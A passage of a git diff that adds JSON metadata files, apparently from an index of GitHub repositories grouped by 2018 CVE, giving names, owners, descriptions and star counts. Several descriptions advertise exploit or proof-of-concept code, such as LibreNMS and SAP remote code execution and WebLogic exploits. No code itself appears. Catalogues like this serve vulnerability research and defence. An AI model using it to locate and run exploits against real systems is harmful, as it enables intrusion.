"watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20377.json b/2018/CVE-2018-20377.json new file mode 100644 index 0000000000..8f7224b718 --- /dev/null +++ b/2018/CVE-2018-20377.json @@ -0,0 +1,38 @@ +[ + { + "id": 154995137, + "name": "LIVEBOX-0DAY", + "full_name": "zadewg\/LIVEBOX-0DAY", + "owner": { + "login": "zadewg", + "id": 38017709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38017709?v=4", + "html_url": "https:\/\/github.com\/zadewg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zadewg\/LIVEBOX-0DAY", + "description": "CVE-2018-20377; 20575; 20576; 20577 Multiple security vulnerabilities affecting latest firmware release on ORANGE Livebox modems.", + "fork": false, + "created_at": "2018-10-27T18:13:42Z", + "updated_at": "2023-11-15T12:29:51Z", + "pushed_at": "2023-10-31T02:36:27Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "csrf", + "privacy", + "router" + ], + "visibility": "public", + "forks": 12, + "watchers": 74, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20433.json b/2018/CVE-2018-20433.json new file mode 100644 index 0000000000..61d76d9dcf --- /dev/null +++ b/2018/CVE-2018-20433.json @@ -0,0 +1,33 @@ +[ + { + "id": 321055902, + "name": "cp30_XXE_partial_fix", + "full_name": "shanika04\/cp30_XXE_partial_fix", + "owner": { + "login": "shanika04", + "id": 73774345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73774345?v=4", + "html_url": "https:\/\/github.com\/shanika04", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanika04\/cp30_XXE_partial_fix", + "description": "version between CVE-2018-20433 and CVE-2019-5427", + "fork": false, + "created_at": "2020-12-13T12:08:30Z", + "updated_at": "2020-12-13T12:10:34Z", + "pushed_at": "2020-12-13T12:10:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20434.json b/2018/CVE-2018-20434.json new file mode 100644 index 0000000000..6bc31ef24a --- /dev/null +++ b/2018/CVE-2018-20434.json @@ -0,0 +1,33 @@ +[ + { + "id": 183417425, + "name": "CVE-2018-20434", + "full_name": "mhaskar\/CVE-2018-20434", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2018-20434", + "description": "The official exploit code for LibreNMS v1.46 Remote Code Execution CVE-2018-20434", + "fork": false, + "created_at": "2019-04-25T11:06:48Z", + "updated_at": "2024-08-12T19:48:15Z", + "pushed_at": "2019-04-25T11:07:10Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20463.json b/2018/CVE-2018-20463.json new file mode 100644 index 0000000000..c6248acc9f --- /dev/null +++ b/2018/CVE-2018-20463.json @@ -0,0 +1,33 @@ +[ + { + "id": 527362385, + "name": "CVE-2018-20463", + "full_name": "Henry4E36\/CVE-2018-20463", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2018-20463", + "description": "WordPress JSmol2WP Plugin 1.07版本中存在安全漏洞。攻击者可利用该漏洞读取任意文件。", + "fork": false, + "created_at": "2022-08-22T00:37:14Z", + "updated_at": "2024-06-26T10:34:04Z", + "pushed_at": "2022-08-22T00:59:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20555.json b/2018/CVE-2018-20555.json new file mode 100644 index 0000000000..1dab520148 --- /dev/null +++ b/2018/CVE-2018-20555.json @@ -0,0 +1,40 @@ +[ + { + "id": 166056481, + "name": "CVE-2018-20555", + "full_name": "fs0c131y\/CVE-2018-20555", + "owner": { + "login": "fs0c131y", + "id": 36547191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36547191?v=4", + "html_url": "https:\/\/github.com\/fs0c131y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fs0c131y\/CVE-2018-20555", + "description": "Social Network Tabs Wordpress Plugin Vulnerability - CVE-2018-20555", + "fork": false, + "created_at": "2019-01-16T14:45:44Z", + "updated_at": "2024-08-12T19:44:55Z", + "pushed_at": "2020-10-20T14:30:01Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2018-20555", + "infosec", + "vulnerability", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 21, + "watchers": 75, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20580.json b/2018/CVE-2018-20580.json new file mode 100644 index 0000000000..d3a29bd1b5 --- /dev/null +++ b/2018/CVE-2018-20580.json @@ -0,0 +1,33 @@ +[ + { + "id": 184798230, + "name": "CVE-2018-20580", + "full_name": "gscamelo\/CVE-2018-20580", + "owner": { + "login": "gscamelo", + "id": 10172446, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10172446?v=4", + "html_url": "https:\/\/github.com\/gscamelo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gscamelo\/CVE-2018-20580", + "description": "A proof of concept for ReadyAPI 2.5.0\/2.6.0 Remote Code Execution Vulnerability.", + "fork": false, + "created_at": "2019-05-03T17:53:17Z", + "updated_at": "2022-08-16T19:08:04Z", + "pushed_at": "2022-08-19T19:04:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20718.json b/2018/CVE-2018-20718.json new file mode 100644 index 0000000000..5a47c4bca4 --- /dev/null +++ b/2018/CVE-2018-20718.json @@ -0,0 +1,33 @@ +[ + { + "id": 196255066, + "name": "CVE-2018-20718", + "full_name": "us3r777\/CVE-2018-20718", + "owner": { + "login": "us3r777", + "id": 8191240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8191240?v=4", + "html_url": "https:\/\/github.com\/us3r777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/us3r777\/CVE-2018-20718", + "description": null, + "fork": false, + "created_at": "2019-07-10T18:19:59Z", + "updated_at": "2022-04-01T22:37:41Z", + "pushed_at": "2019-07-15T13:39:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20966.json b/2018/CVE-2018-20966.json new file mode 100644 index 0000000000..84fbabee28 --- /dev/null +++ b/2018/CVE-2018-20966.json @@ -0,0 +1,33 @@ +[ + { + "id": 316803871, + "name": "CVE-2018-20966", + "full_name": "parzel\/CVE-2018-20966", + "owner": { + "login": "parzel", + "id": 9403390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9403390?v=4", + "html_url": "https:\/\/github.com\/parzel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/parzel\/CVE-2018-20966", + "description": "CVE-2018-20966: XSS in woocommerce-jetpack < 3.8.0", + "fork": false, + "created_at": "2020-11-28T19:08:43Z", + "updated_at": "2020-11-28T19:09:15Z", + "pushed_at": "2020-11-28T19:09:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-2380.json b/2018/CVE-2018-2380.json new file mode 100644 index 0000000000..193b567929 --- /dev/null +++ b/2018/CVE-2018-2380.json @@ -0,0 +1,37 @@ +[ + { + "id": 125186745, + "name": "CVE-2018-2380", + "full_name": "erpscanteam\/CVE-2018-2380", + "owner": { + "login": "erpscanteam", + "id": 35491827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35491827?v=4", + "html_url": "https:\/\/github.com\/erpscanteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erpscanteam\/CVE-2018-2380", + "description": "PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM", + "fork": false, + "created_at": "2018-03-14T09:20:21Z", + "updated_at": "2024-08-12T19:36:55Z", + "pushed_at": "2018-03-14T12:13:43Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-2380", + "exploit", + "sap" + ], + "visibility": "public", + "forks": 12, + "watchers": 52, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-2392.json b/2018/CVE-2018-2392.json new file mode 100644 index 0000000000..b4beb29c19 --- /dev/null +++ b/2018/CVE-2018-2392.json @@ -0,0 +1,33 @@ +[ + { + "id": 300696035, + "name": "sap_igs_xxe", + "full_name": "Vladimir-Ivanov-Git\/sap_igs_xxe", + "owner": { + "login": "Vladimir-Ivanov-Git", + "id": 24264685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24264685?v=4", + "html_url": "https:\/\/github.com\/Vladimir-Ivanov-Git", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vladimir-Ivanov-Git\/sap_igs_xxe", + "description": "SAP IGS XXE attack CVE-2018-2392 and CVE-2018-2393", + "fork": false, + "created_at": "2020-10-02T17:57:22Z", + "updated_at": "2024-11-25T09:53:36Z", + "pushed_at": "2020-10-08T18:58:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-25031.json b/2018/CVE-2018-25031.json new file mode 100644 index 0000000000..924aac8f53 --- /dev/null +++ b/2018/CVE-2018-25031.json @@ -0,0 +1,374 @@ +[ + { + "id": 496741511, + "name": "CVE-2018-25031", + "full_name": "afine-com\/CVE-2018-25031", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2018-25031", + "description": ".json and .yaml files used to exploit CVE-2018-25031", + "fork": false, + "created_at": "2022-05-26T19:06:21Z", + "updated_at": "2023-11-01T08:35:32Z", + "pushed_at": "2024-04-05T11:54:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 585903651, + "name": "CVE-2018-25031", + "full_name": "kriso4os\/CVE-2018-25031", + "owner": { + "login": "kriso4os", + "id": 6018110, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6018110?v=4", + "html_url": "https:\/\/github.com\/kriso4os", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kriso4os\/CVE-2018-25031", + "description": null, + "fork": false, + "created_at": "2023-01-06T11:58:15Z", + "updated_at": "2023-01-06T11:58:15Z", + "pushed_at": "2023-02-15T14:51:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 628050830, + "name": "SwaggerUI-CVE-2018-25031", + "full_name": "rafaelcintralopes\/SwaggerUI-CVE-2018-25031", + "owner": { + "login": "rafaelcintralopes", + "id": 1049012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1049012?v=4", + "html_url": "https:\/\/github.com\/rafaelcintralopes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rafaelcintralopes\/SwaggerUI-CVE-2018-25031", + "description": "Exploit Swagger UI - User Interface (UI) Misrepresentation of Critical Information (CVE-2018-25031)", + "fork": false, + "created_at": "2023-04-14T19:48:29Z", + "updated_at": "2023-04-15T03:04:32Z", + "pushed_at": "2023-04-14T20:31:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 659754746, + "name": "CVE-2018-25031", + "full_name": "mathis2001\/CVE-2018-25031", + "owner": { + "login": "mathis2001", + "id": 40497633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40497633?v=4", + "html_url": "https:\/\/github.com\/mathis2001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mathis2001\/CVE-2018-25031", + "description": "CVE-2018-25031 tests", + "fork": false, + "created_at": "2023-06-28T13:41:22Z", + "updated_at": "2024-10-01T11:51:08Z", + "pushed_at": "2024-10-01T11:51:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714870355, + "name": "CVE-2018-25031", + "full_name": "wrkk112\/CVE-2018-25031", + "owner": { + "login": "wrkk112", + "id": 56062780, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56062780?v=4", + "html_url": "https:\/\/github.com\/wrkk112", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wrkk112\/CVE-2018-25031", + "description": "CVE-2018-25031 Test PoC", + "fork": false, + "created_at": "2023-11-06T02:26:03Z", + "updated_at": "2023-11-13T02:41:17Z", + "pushed_at": "2023-11-21T09:47:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719336739, + "name": "CVE-2018-25031", + "full_name": "LUCASRENAA\/CVE-2018-25031", + "owner": { + "login": "LUCASRENAA", + "id": 58091788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58091788?v=4", + "html_url": "https:\/\/github.com\/LUCASRENAA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LUCASRENAA\/CVE-2018-25031", + "description": null, + "fork": false, + "created_at": "2023-11-16T00:29:31Z", + "updated_at": "2023-11-16T00:31:18Z", + "pushed_at": "2023-11-16T00:31:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 731288552, + "name": "CVE-2018-25031-PoC", + "full_name": "hev0x\/CVE-2018-25031-PoC", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2018-25031-PoC", + "description": "PoC of CVE-2018-25031", + "fork": false, + "created_at": "2023-12-13T18:42:20Z", + "updated_at": "2023-12-13T18:42:21Z", + "pushed_at": "2024-01-03T15:11:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 761708390, + "name": "CVE-2018-25031-test2", + "full_name": "johnlaurance\/CVE-2018-25031-test2", + "owner": { + "login": "johnlaurance", + "id": 159469047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159469047?v=4", + "html_url": "https:\/\/github.com\/johnlaurance", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/johnlaurance\/CVE-2018-25031-test2", + "description": null, + "fork": false, + "created_at": "2024-02-22T10:41:45Z", + "updated_at": "2024-02-22T10:41:45Z", + "pushed_at": "2024-02-23T15:06:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801275554, + "name": "POC-CVE-2018-25031", + "full_name": "geozin\/POC-CVE-2018-25031", + "owner": { + "login": "geozin", + "id": 57465104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57465104?v=4", + "html_url": "https:\/\/github.com\/geozin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geozin\/POC-CVE-2018-25031", + "description": "A simple POC (CVE-2018-25031", + "fork": false, + "created_at": "2024-05-15T23:21:58Z", + "updated_at": "2024-05-16T02:16:36Z", + "pushed_at": "2024-05-16T02:16:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803580529, + "name": "CVE-2018-25031", + "full_name": "h2oa\/CVE-2018-25031", + "owner": { + "login": "h2oa", + "id": 114990730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114990730?v=4", + "html_url": "https:\/\/github.com\/h2oa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h2oa\/CVE-2018-25031", + "description": null, + "fork": false, + "created_at": "2024-05-21T02:09:02Z", + "updated_at": "2024-05-21T02:28:39Z", + "pushed_at": "2024-05-21T02:28:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833085914, + "name": "SSRF-CVE-2018-25031-", + "full_name": "natpakun\/SSRF-CVE-2018-25031-", + "owner": { + "login": "natpakun", + "id": 127197790, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127197790?v=4", + "html_url": "https:\/\/github.com\/natpakun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/natpakun\/SSRF-CVE-2018-25031-", + "description": null, + "fork": false, + "created_at": "2024-07-24T10:21:30Z", + "updated_at": "2024-07-24T10:22:51Z", + "pushed_at": "2024-07-24T10:22:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 888975074, + "name": "CVE-2018-25031-SG", + "full_name": "KonEch0\/CVE-2018-25031-SG", + "owner": { + "login": "KonEch0", + "id": 102297040, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102297040?v=4", + "html_url": "https:\/\/github.com\/KonEch0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KonEch0\/CVE-2018-25031-SG", + "description": "CVE-2018-25031-SG", + "fork": false, + "created_at": "2024-11-15T11:13:58Z", + "updated_at": "2024-11-15T11:21:40Z", + "pushed_at": "2024-11-15T11:21:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-25032.json b/2018/CVE-2018-25032.json new file mode 100644 index 0000000000..5502425fa7 --- /dev/null +++ b/2018/CVE-2018-25032.json @@ -0,0 +1,95 @@ +[ + { + "id": 543047050, + "name": "external_zlib_4.4_CVE-2018-25032", + "full_name": "Trinadh465\/external_zlib_4.4_CVE-2018-25032", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_zlib_4.4_CVE-2018-25032", + "description": null, + "fork": false, + "created_at": "2022-09-29T09:59:39Z", + "updated_at": "2023-09-16T13:04:21Z", + "pushed_at": "2022-09-29T12:26:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 578122944, + "name": "external_zlib-1.2.7_CVE-2018-25032", + "full_name": "Satheesh575555\/external_zlib-1.2.7_CVE-2018-25032", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_zlib-1.2.7_CVE-2018-25032", + "description": null, + "fork": false, + "created_at": "2022-12-14T10:07:01Z", + "updated_at": "2022-12-14T10:10:49Z", + "pushed_at": "2022-12-14T10:11:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614774526, + "name": "external_zlib_AOSP10_r33_CVE-2018-25032", + "full_name": "Trinadh465\/external_zlib_AOSP10_r33_CVE-2018-25032", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_zlib_AOSP10_r33_CVE-2018-25032", + "description": null, + "fork": false, + "created_at": "2023-03-16T09:44:18Z", + "updated_at": "2023-03-16T09:45:20Z", + "pushed_at": "2023-03-16T09:46:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-25075.json b/2018/CVE-2018-25075.json new file mode 100644 index 0000000000..7c89a020c7 --- /dev/null +++ b/2018/CVE-2018-25075.json @@ -0,0 +1,33 @@ +[ + { + "id": 801751761, + "name": "obridge", + "full_name": "epicosy\/obridge", + "owner": { + "login": "epicosy", + "id": 30272775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30272775?v=4", + "html_url": "https:\/\/github.com\/epicosy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/epicosy\/obridge", + "description": "obride with CVE-2018-25075", + "fork": false, + "created_at": "2024-05-16T20:59:32Z", + "updated_at": "2024-05-16T21:14:46Z", + "pushed_at": "2024-05-16T21:14:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-2628.json b/2018/CVE-2018-2628.json new file mode 100644 index 0000000000..ea6f1b49e6 --- /dev/null +++ b/2018/CVE-2018-2628.json @@ -0,0 +1,709 @@ +[ + { + "id": 129995161, + "name": "CVE-2018-2628", + "full_name": "forlin\/CVE-2018-2628", + "owner": { + "login": "forlin", + "id": 3012554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3012554?v=4", + "html_url": "https:\/\/github.com\/forlin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forlin\/CVE-2018-2628", + "description": "CVE-2018-2628", + "fork": false, + "created_at": "2018-04-18T02:56:39Z", + "updated_at": "2024-11-25T09:51:39Z", + "pushed_at": "2018-04-18T02:48:58Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 39, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 130009588, + "name": "CVE-2018-2628", + "full_name": "shengqi158\/CVE-2018-2628", + "owner": { + "login": "shengqi158", + "id": 3364935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3364935?v=4", + "html_url": "https:\/\/github.com\/shengqi158", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shengqi158\/CVE-2018-2628", + "description": "CVE-2018-2628 & CVE-2018-2893", + "fork": false, + "created_at": "2018-04-18T05:41:23Z", + "updated_at": "2024-08-12T19:37:50Z", + "pushed_at": "2018-07-20T01:24:36Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 78, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 130047996, + "name": "CVE-2018-2628", + "full_name": "skydarker\/CVE-2018-2628", + "owner": { + "login": "skydarker", + "id": 25345671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25345671?v=4", + "html_url": "https:\/\/github.com\/skydarker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skydarker\/CVE-2018-2628", + "description": "CVE-2018-2628", + "fork": false, + "created_at": "2018-04-18T10:50:09Z", + "updated_at": "2018-04-18T11:23:19Z", + "pushed_at": "2018-04-18T11:23:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 130088305, + "name": "weblogic-cve-2018-2628", + "full_name": "jiansiting\/weblogic-cve-2018-2628", + "owner": { + "login": "jiansiting", + "id": 28823754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28823754?v=4", + "html_url": "https:\/\/github.com\/jiansiting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiansiting\/weblogic-cve-2018-2628", + "description": null, + "fork": false, + "created_at": "2018-04-18T16:04:17Z", + "updated_at": "2024-08-12T19:37:51Z", + "pushed_at": "2018-04-18T16:04:26Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 130098527, + "name": "CVE-2018-2628-detect", + "full_name": "zjxzjx\/CVE-2018-2628-detect", + "owner": { + "login": "zjxzjx", + "id": 8297291, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8297291?v=4", + "html_url": "https:\/\/github.com\/zjxzjx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zjxzjx\/CVE-2018-2628-detect", + "description": null, + "fork": false, + "created_at": "2018-04-18T17:28:44Z", + "updated_at": "2024-08-12T19:37:51Z", + "pushed_at": "2018-04-20T03:47:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 130101048, + "name": "CVE-2018-2628-MultiThreading", + "full_name": 